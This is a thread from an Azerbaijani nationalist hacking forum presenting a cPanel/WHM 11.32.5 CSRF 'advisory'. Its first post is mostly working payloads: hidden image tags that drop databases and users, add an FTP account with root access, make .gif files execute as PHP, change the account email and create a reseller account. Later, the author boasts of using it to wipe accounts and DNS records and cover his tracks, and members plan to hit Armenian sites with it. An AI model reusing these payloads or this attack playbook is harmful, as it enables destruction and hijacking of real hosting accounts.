Anti-armenia.ORG - Forumlar - cPanel version : 11.32.5 0day



Istifadəçi
    2012-10-21 02:45 GMT                 

BlackMinD



Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Kimki cpanelin bu versiyasından istifadə edirsə ehtiyyatlı olsun.Cpanelə login olmuşkən heç bir sayta daxil olmasın.
Əks halda owned olmaq qaçılmazdır.
Nələr etmək olduğunu aşağıdakı advisoryimdə göstərmişəm.




http://pastebin.com/JnPC3K3D



Kod:
==============================================================================
Vulnerable Software: cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ]
Vulnerability: CSRF
Vendor: cpanel.net
==============================================================================

=====================================================================
Tested version: Your current cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ]

Aka: Cpanel Accelerated 2 
via
WHM 11.32.5 (build 11)

=====================================================================

CSRF: Drop Database: (Method $_GET)

<img src="http://***********.net:2082/frontend/x3/sql/deldb.html?db=armenian_music" heigth="0" width="0" />

Here we are going to drop database named: armenian_music
=====================================================================

CSRF: Drop mysql user: (Method $_GET)


<img src="http://************.net:2082/frontend/x3/sql/deluser.html?user=armenian_adserve" heigth="0" width="0" />
Here we are going to drop mysql user named: armenian_adserver     ))

=====================================================================
CSRF: Change email address:  (Contact Information & Preferences) (Method $_GET)
Changing email address to: owned_and_owned_again@gmail.tld

<img src="http://***********.net:2082/frontend/x3/contact/saveemail.html?email=owned_and_owned_again%40gmail.tld&second_email=¬ify_disk_limit=1¬ify_bandwidth_limit=1¬ify_email_quota_limit=1" heigth="0" width="0" />


=====================================================================

CSRF adding FTP account:

username: akastep
password: akastep
host is target host.


<img src="http://***********.net:2082/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Ftp&cpanel_jsonapi_func=addftp&user=akastep&pass=akastep&homedir=/"a=0&cache_fix=owned_by_akastep" heigth="0" width="0" />

=====================================================================


CSRF Drop FTP account:

Deletes existent ftp account named:   axaxa


<img src="http://************.net:2082/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Ftp&cpanel_jsonapi_func=delftp&user=axaxa&cache_fix=OWNED" heigth="0" width="0" />

=====================================================================



CSRF change Apache handler:

(Parse .gif file as php script)

<img src="http://***********.net:2082/frontend/x3/mime/addhandle.html?handle=application/x-httpd-php&ext=.gif&submit=Add" heigth="0" width="0" />
=====================================================================


CSRF Delete handler:


<img src="http://***********.net:2082/frontend/x3/mime/delhandle.html?userhandle=.php" heigth="0" width="0" />


=====================================================================

WHM 11.32.5 (build 11)


CSRF: Add Reseller+setup
with domain: owned.com
username: owned111
password: MYVERYSTRONGGOESHERE
And contact email: owned@owned1.you

<img src="http://***********.net:2086/scripts5/wwwacct?sign=&plan=Reseller+setup&domain=owned.com&username=owned111&password=MYVERYSTRONGGOESHERE&contactemail=owned%40owned1.you&dbuser=owned&msel=n%2Cy%2C1%2Cn%2Cx3%2C1%2C1%2C1%2C1%2C1%2C1000%2Cn%2C0%2C0%2Cdefault%2Cen%2C%2C%2CReseller+setup&pkgname=&featurelist=default"a=1&bwlimit=1000&maxftp=1&maxpop=1&maxlst=1&maxsql=1&maxsub=1&maxpark=0&maxaddon=0&cgi=1&cpmod=x3&language=en&hasuseregns=1&dkim=1&mxcheck=local" heigth="0" width="0" />


=====================================================================





================================================

SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
osvdb.com
websecurity.com.ua

to all Aa Team + to all Azerbaijan Black HatZ +
      *Especially to my bro CAMOUFL4G3 *
Also special thanks to: ottoman38 & HERO_AZE
================================================

/AkaStep

Ana VƏTƏN!
Anti-armenia.ORG
    

Istifadəçi
    2012-10-21 06:22 GMT                 

TheConficker



VIP
Mesaj Sayı : 195
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   6  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


bunu erməni cöanelində test etmisən?
bahoo cpanellərdədə bug olarmış
təşəkkürlər bro məlumat üçün

Anti-armenia.ORG
    

Istifadəçi
    2012-10-21 08:21 GMT                 

Ferid23



Admin
Mesaj Sayı : 1875
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   45  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Anti-armenia.ORG
Ölkə :
Məslək : Programmer & Defacer
Yaş : 12
Mesaj :

Mövzunu Paylaş!


Çox sağ ol bro dəyərli məlumat üçün

AZ Domaini İhbar Hattı (Azərbaycan saytlarında olan boşluqları bizə bildirin): http://anti-armenia.org/forums.php?m=posts&q=572
Qaydalar (Saytın qayda-qanunlarını oxuyaraq əməl edin)
Anti-armenia.ORG
    

Istifadəçi
    2012-10-21 13:36 GMT                 

Avatar Fearless



VIP
Mesaj Sayı : 1299
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   23  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Gävle
Ölkə :
Məslək : Hacker,Defacer,Programmer
Yaş : 26
Mesaj :

Mövzunu Paylaş!


o.O Həqiqətən alqışlayıram advisory-da lap belə Reseller yaratmağa qədər exploitlənmiş source-lər var Təbriklər + Respect

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG
    

Istifadəçi
    2012-10-21 19:29 GMT                 

BlackMinD



Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


@TheConficker hə bro inanki beyin o qədər çönmüşdü istəyirdim WHM-də ssh-i aktiv edim girim mələdim yerli dibli oraları başladım cpaneli qurdalamağa tapdıqlarım bunlar oldu.
SSH-ə amma heç ehtiyyac olmadı aktiv etməyə (edə bilməyəcəkdim disable edilmişdi yerli dibli) bütün akkauntları fayllarını DNS entryləri zadı uçurtdum passı də dəyişdim + izləri də pozdum cırdım aradan)))))))
Saytların 99.99% downdadır hal hazırda)))

@TheConficker & @Ferid23 & Avatar Fearless
Təşəkkürlər

Ana VƏTƏN!
Anti-armenia.ORG
    

Istifadəçi
    2013-05-25 08:17 GMT                 

behnur_98



Banned
Mesaj Sayı : 83
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Əla Təşəkkürlər bunu erməni saytında birinci test edəcəm

Anti-armenia.ORG
    

Istifadəçi
    2013-05-25 12:08 GMT                 

Frozen



İstifadəçi
Mesaj Sayı : 135
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Respect+1 gözəl işdi
tutaq ki mən cPanelə girdim başqa sayta və ya öz saytıma nə kimi zərər yetirə bilərlər??

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG
    

Istifadəçi
    2013-05-29 20:23 GMT                 

BlackMinD



Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Frozen
xahiş olunur bir qədər diqqətlə oxu advisory-ni başa düşəcəksən 1-dəfə yazdığımı inanki həvəs nə də vaxt nə də səbr yoxdur yenidən başa salmağa ya yazmağa.
Bu CSRF -vulndur.
Yəniki yuxarıda göstərdiyim əməliyyatları eetməklə (xüsusilə victimin kontekstində həmin nəticələrə gətirib çıxara bilərsən)
ftp akkaunt əlavə etməkdən tutmuş (sakit şəkildə ) database-in drop edilməsinə qədər.

Ana VƏTƏN!
Anti-armenia.ORG
    

Istifadəçi
    2013-06-14 14:31 GMT                 

isa213



İstifadəçi
Mesaj Sayı : 14
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Laçın
Ölkə :
Məslək : sagird
Yaş : 25
Mesaj :

Mövzunu Paylaş!


Sağol bro süperdi yalnız düzgün istifadə etmək lazımdı

Azərbaycan bir olsun istəmiyən kor olsun

BozQurd

Azəri Türkü
Anti-armenia.ORG
    

Istifadəçi
    2014-01-25 13:53 GMT                 

H!T4CH



VIP
Mesaj Sayı : 348
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   12  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : BAKU
Ölkə :
Məslək :
Yaş : 131
Mesaj :

Mövzunu Paylaş!


Təşəkkür Bro Dəyərli Məlumatdır

CODE
Anti-armenia.ORG
    

Istifadəçi
    2014-01-25 16:26 GMT                 

GR33NM4X



İstifadəçi
Mesaj Sayı : 163
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   4  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Super Brom Respect

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG